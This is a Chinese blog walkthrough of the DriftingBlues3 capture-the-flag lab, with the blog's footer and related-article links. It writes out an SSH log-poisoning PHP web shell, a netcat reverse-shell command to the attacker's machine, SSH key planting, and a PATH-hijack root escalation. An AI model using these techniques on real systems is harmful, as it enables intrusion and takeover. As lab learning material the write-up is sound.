driftingblues3-靶机

最新推荐文章于 2023-10-03 23:37:09 发布
最新推荐文章于 2023-10-03 23:37:09 发布
阅读量132 收藏
点赞数 1
分类专栏: 靶机系列 文章标签: debian 网络 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/130283690
版权

文章目录

环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式

kali扫描不到靶机IP解决办法请看Momentum2中有解决办法

一.明确目标 🎈🎈

探测目标主机IP情况

sudo arp-scan -l

在这里插入图片描述

目标主机IP:192.168.107.138

Kali的IP:192.168.107.129

二.信息搜集 🎈

Nmap 进行常规端口开放扫描

nmap 192.168.107.134 -p- -A

在这里插入图片描述

发现目标靶机开放了ssh 22端口,http 80端口。(以及Apache httpd 2.4.38 Debian的版本, OpenSSH 7.9p1 Debian)

在浏览器中访问一下目标靶机的80端口:

在这里插入图片描述

暂时没发现啥可以利用的

🍉 1.使用dirsearch命令对靶机网站目录进行扫描 🍉 🍉

dirsearch -u 192.168.107.138

在这里插入图片描述

Target: http://192.168.107.138/

[07:21:38] Starting: 
[07:21:39] 403 -  280B  - /.ht_wsr.txt                                     
[07:21:39] 403 -  280B  - /.htaccess.orig
[07:21:39] 403 -  280B  - /.htaccess.bak1
[07:21:39] 403 -  280B  - /.htaccess.sample
[07:21:39] 403 -  280B  - /.htaccess_orig
[07:21:39] 403 -  280B  - /.htaccess_extra
[07:21:39] 403 -  280B  - /.htaccess.save
[07:21:39] 403 -  280B  - /.htaccessBAK
[07:21:39] 403 -  280B  - /.htaccessOLD
[07:21:39] 403 -  280B  - /.htaccess_sc
[07:21:39] 403 -  280B  - /.htaccessOLD2                                   
[07:21:39] 403 -  280B  - /.html
[07:21:39] 403 -  280B  - /.htm
[07:21:39] 403 -  280B  - /.httr-oauth                                     
[07:21:39] 403 -  280B  - /.htpasswd_test                                  
[07:21:39] 403 -  280B  - /.htpasswds                                      
[07:21:40] 403 -  280B  - /.php                                            
[07:21:42] 200 -   11B  - /MANIFEST.MF                                      
[07:21:42] 200 -   11B  - /Makefile                                         
[07:21:55] 301 -  319B  - /drupal  ->  http://192.168.107.138/drupal/       
[07:21:59] 200 -    1KB - /index.html                                       
[07:22:07] 301 -  323B  - /phpmyadmin  ->  http://192.168.107.138/phpmyadmin/
[07:22:08] 200 -  268B  - /phpmyadmin/                                      
[07:22:09] 301 -  320B  - /privacy  ->  http://192.168.107.138/privacy/     
[07:22:10] 200 -   37B  - /robots.txt                                       
[07:22:11] 301 -  319B  - /secret  ->  http://192.168.107.138/secret/       
[07:22:11] 200 -   90B  - /secret/                                          
[07:22:11] 403 -  280B  - /server-status                                    
[07:22:11] 403 -  280B  - /server-status/
[07:22:17] 200 -  948B  - /wp-admin/                                        
[07:22:17] 301 -  321B  - /wp-admin  ->  http://192.168.107.138/wp-admin/
                                                                             
Task Completed

http://192.168.107.138/MANIFEST.MF

http://192.168.107.138/drupal/

http://192.168.107.138/phpmyadmin/

http://192.168.107.138/privacy/

http://192.168.107.138/robots.txt

http://192.168.107.138/secret/

http://192.168.107.138/wp-admin/ji

经过浏览器逐个访问,发现http://192.168.107.138/robots.txt下有东西

在这里插入图片描述

再去访问一下http://192.168.107.138/eventadmins/,里面有个目录 /littlequeenofspades.html

在这里插入图片描述

大该意思说SSH存在问题,切让我们检查 这个文件littlequeenofspades.html

浏览器访问http://192.168.107.138/littlequeenofspades.html

在这里插入图片描述

发现好像是一串个歌词 但是好像没啥用 F12查看源代码 ,发现是一串base64加密的 直接解码

在这里插入图片描述

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

在线解密一下:http://www.jsons.cn/base64/

经过两次base64解密得到了/adminsfixit.php

在这里插入图片描述

浏览器访问http://192.168.107.138/adminsfixit.php

在这里插入图片描述

发现居然是ssh的日志记录,看到出现ssh auth log --> ssh身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,那么我们就可以在用户名处注入可以被执行的脚本(一句话木马)然后尝试访问它就可以实现RCE命令执行。

🌈2.在kali中进行SSH登录,且把用户名改为一句话木马 🌈 🌈 🌈

ssh '<?php system($_GET["cmd"]);?>'@192.168.107.139

😁 😁 😁嘿嘿!!!这里靶机被玩坏了,重置了靶机,其IP变为192.168.107.139

在这里插入图片描述

curl -i -L http://192.168.107.139/adminsfixit.php?cmd=ls

在这里插入图片描述

写入成功,且RCE执行成功!!!

🥝3.使用nc回弹shell:🌈🌈🌈

kali开启监听:

在这里插入图片描述

使用nc进行反弹,反弹成功!!!

http://192.168.107.139/adminsfixit.php?cmd=nc -e /bin/bash 192.168.107.129 8888

在这里插入图片描述

获得交互shell

SHELL=/bin/bash script /dev/null

在这里插入图片描述

在home目录下发现一个新用户发现user.txt,但是查看不了

在这里插入图片描述

发现存在.ssh文件夹,但里面是空的,没有任何东西。

此时我们可以尝试SSH公钥私钥免密登陆

查看ssh配置文件/etc/ssh/sshd_config,如下图PubkeyAuthentication选项参数值为yes,打开这个功能,表示ssh允许公钥登录。

在这里插入图片描述

并且此时我们看到.ssh文件夹有着wrx所有的权限,好家伙,所以我们可以把公钥文件放入这个文件夹,进行登录!

在这里插入图片描述

直接在目标机生成一个公钥:ssh-keygen -t rsa
将生成的私钥保存到:/home/robertj/.ssh/id_rsa 
将 SSH 公钥文件重命名为 authorized_keys ,用于 SSH 登陆认证
cat id_rsa.pub > authorized_keys
然后将私钥复制到本机
chmod 400 id_rsa

在这里插入图片描述

在这里插入图片描述

然后把这ssh 私钥复制到桌面 因为我这里输入了密码:123456 所以等下也要输入!!!

💎4.ssh私钥登入: 🎉 🎉 🎉

在这里插入图片描述

三.提权 🧸🧸

🔭1.find查找具有suid权限的命令 ⚽ ⚽ ⚽

find / -perm -u=s -type f 2>/dev/null
find / -perm 4000 -type f 2>/dev/null  (两个相同的结果)

在这里插入图片描述

发现一个getinfo命令

执行一下命令,发现这个命令集合了(系统命令)

在这里插入图片描述

这里既然调用了系统命令,那么我们可以自行编写一个同名文件,比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权

🍓 2.环境变量命令劫持提权 🍀 🍀 🍀

因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一
个 ip 或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权:
cd /tmp	
export PATH=/tmp/:$PATH     把/tmp路径加入到系统路径中。				
echo '/bin/bash' > cat		把/bin/bash写入到ip中。
chmod +x cat					增加执行权限
getinfo

在这里插入图片描述

在这里插入图片描述

提权成功!!!

四.总结 🔎🔎

  1. 信息收集,端口日常开放22、80端口,隐藏目录dirsearch测试一波。
  2. 多层隐藏目录一层扣一层,最后还查看源代码发现了base64密码串。
  3. 通过base64密码串解密得到了一个SSH日志信息记录,使用异常的ssh登陆(将用户名改为一句话木马,实现RCE),并通过nc反弹shell。
  4. 反弹shell成功后,在home下发现新用户一定要进去看一看,发现了.ssh文件
  5. SSH公钥私钥免密登陆(又是新知识)。
  6. 最后常规SUID搜索发现一个getinfo命令集合了系统命令。
  7. 使用环境变量进行命令劫持提权(还是新知识)。
gaynell
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali扫不到靶机ip的解决办法
weixin_52963334的博客
08-08 2651
扫不到靶机ip
虚拟机讲只读文件变为可读可写文件_linux中 如何将sudoers只读文件改成可读写文件?...
weixin_40001519的博客
12-20 1984
展开全部这个文件只读是一种保护机制,如果32313133353236313431303231363533e78988e69d8331333365633935你使用vi编辑器的话,只要保存时使用:wq!就可以保存了。或者使用visudo命令来进入sudoers文件的编辑,就可以正常保存。具体如下:1、简介Linux操作系统是基于UNIX操作系统发展而来的一种克隆系统,它诞生于1991 年的 [Lin...
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2749
DC-2靶机渗透测试思路及流程
Os-Hax靶机测试
weixin_58729813的博客
04-08 263
本文是针对vulnhub靶机测试,拿到两个flag即可
kali、nmap扫描
我不是程序猿的博客
03-17 5005
kali 实际上它就是一个预安装了很多安全工具的Debian Linux [root@zzgrhel8 ~]# kali reset kali reset OK. 该虚拟机系统用户名为:kali,密码为:kali 基础配置 $ ip a s # 查看网络 $ nmcli connection show # 查看到网络连名为"Wired connection 1" $ nmcli connection modify "Wired connection 1" ipv4.metho..
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
连在同一WiFi下的IP地址与Kali netdiscover扫描
m0_47717028的博客
09-28 4323
注:本文仅为作者自我学习中遇到的问题及相关解决方法,语言可能存在不严谨的现象还见谅,同时内容知识如有问题欢迎大家评论或者私信告知,谢谢! 之前我知道了连在同一WiFi下的设备在内网里的IP地址理应属于同一网段,所以我在我手机与电脑连在同一WiFi下去查看了二者的IP地址,但是我发现不太相同: (主机IP地址) (手机IP地址) That's why? 后来我想起了外网内网这个概念,所以我才发现p1其实查询的是电脑的内网IP地址,而p2查询的是手机所连网的外网地址。于是我用电脑去查询...
主机发现与信息收集
qqqwww_sssd的博客
06-29 1302
*任务说明:仅能获取Server1的IP地址1.在Kali中使用Nmap工具查看本地路由与接口,并将该操作使用的全部命令作为Flag值提交;nmap -iflist2.通过Kali对靶机场景进行VNC服务扫描渗透测试,并将使用的脚本名称作为Flag值(如:MySQL-brute.nse)提交;find命令查找关键字“VNC”vnc-brute.nse3.通过Kali对靶机场景进行VNC服务扫描渗透测试,并将该操作显示结果中VNC版本号作为Flag值提交;4.在Kali中使用Nmap发送空的UDP数据对类DN
靶机渗透练习52-KB-VULN-FINAL
hirak0的博客
04-19 518
靶机描述 靶机地址:https://www.vulnhub.com/entry/kb-vuln-4-final,648/ Description This machine is the kind that will measure your level in both research and exploit development. It includes 2 flags:user.txt and root.txt. This works better with VirtualBox rather
Kali--Nmap实战
qq_70434663的博客
03-16 3691
首先在Kali里面察看自己的IP地址,以便后续操作。
一起来打靶 01
cmdos的专栏
03-21 732
0x00 靶机介绍靶机地址:BoredHackerBlog: Social Network ~ VulnHub靶机难度:中推荐虚拟机:VirtualBox0x01 内容简介涉及的攻击方法主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改0x02 环境搭建下载好靶机.ova文件后导入到VirtualBox中即可确保靶机和kali在同一网段中kali IP地址:10.0.2.50x03 信息收集因为靶机和kali在同一网段中,所以优先选择二层的主机发现
靶场练习第七天~vulnhub靶场之mrRobot
qq_57976347的博客
02-01 1532
靶机下载链接: 百度网盘 输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。 2.使用dirb命令扫描靶机网站 用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.16
渗透测试靶机练习 DC-2
weixin_43705814的博客
12-30 299
渗透测试靶机练习 DC-2 一、靶机介绍 与之前的DC-1靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、搭建靶机 直接下载靶机在导入到虚拟机中即可 三、渗透测试获取Flag 1.打开靶机看是都能够正常运行 2.发现Flag 2.1flag1 2.1.1 应为处在同一个局域网中可以使用nmap进行主机发现,进行端口扫描 nmap 10.10.10.0/24 nmap -sV -Pn -p- -O -sS -A 10.10.10.136 ...
综合靶机渗透测试解析
w_j_x_123的博客
05-30 550
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
Web目录及漏洞扫描
最新发布
weixin_51758733的博客
10-03 297
Web目录及漏洞扫描
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机的实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值